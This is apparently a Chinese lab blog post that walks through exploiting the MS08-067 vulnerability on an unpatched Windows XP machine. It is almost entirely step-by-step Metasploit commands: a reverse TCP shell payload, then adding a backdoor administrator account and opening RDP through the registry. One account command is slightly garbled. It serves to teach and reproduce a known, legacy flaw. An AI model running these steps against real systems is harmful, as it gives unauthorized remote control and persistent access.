我竟然把这个坑填下去了,可喜可贺。
1 ms08_067
ms08_067是微软win操作系统中存在的一个服务器服务漏洞,在win server2008之前的系统都会受这个漏洞影响,黑客可以利用这个漏洞控制目标系统。
2 操作概述
使用kali linux攻击机对win xp系统利用此漏洞进行攻击,在靶机上建立管理员账号并远程控制靶机。
3 实验环境
kali linux攻击机(上一篇博客提到过)
win xp sp3 english(纯净版,不带任何补丁)
4 控制靶机
进入kali终端,输入以下命令运行msf:
msfconsole
寻找并使用模块
我们要找的是ms08_067漏洞,所以我们首先寻找此漏洞
search ms08_067_netapi
我们找到漏洞后,使用此漏洞
use exploit/windows/smb/ms08_067_netapi
加载攻击载体
攻击载体有很多,我们这次使用shell_reverse_tcp
set payload generic/shell_reverse_tcp
设置ip
LHOST为攻击机ip,RHOST为靶机ip,例如:
set LHOST 192.168.1.62
寻找对应版本target
target需要与靶机系统版本对应,在不确定版本时设置target为0也可自动选择
set target 0
运行
exploit
到此,我们就进入了靶机系统,你的kali Terminal应该显示以下信息。

5 远程桌面连接
接下来,我们尝试在靶机上创建账户并使用远程桌面连接靶机,
首先,我们创建一个账户。
user net host-name password /add
提升为管理员权限
net localgroup administrators host-name /add
winxp远程操控端口为3389,我们将这个端口打开
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat查看端口
netstat -an
这时,我们会发现3389端口处于开启状态。
然后,我们可以用局域网内的计算机远程桌面连接到靶机,win10运行——>MSTSC。
以上就是ms08_067漏洞利用复现的全过程。
6 问题记录
访问445端口被拒绝
装了445端口补丁的winxp将445端口停用,所以复现此例程时不要使用带补丁的win xp。
还有可能是因为靶机打开了防火墙,复现时需要将防火墙关闭。
设置target
如果不设置target,将不会判断靶机的系统版本进行攻击。建议将target设置为0,target为0时会自动判断靶机系统版本攻击。
7 小结
winxp上的漏洞其实还有很多,感兴趣的同学可以查一下其他的漏洞并尝试复现,折腾永不停止!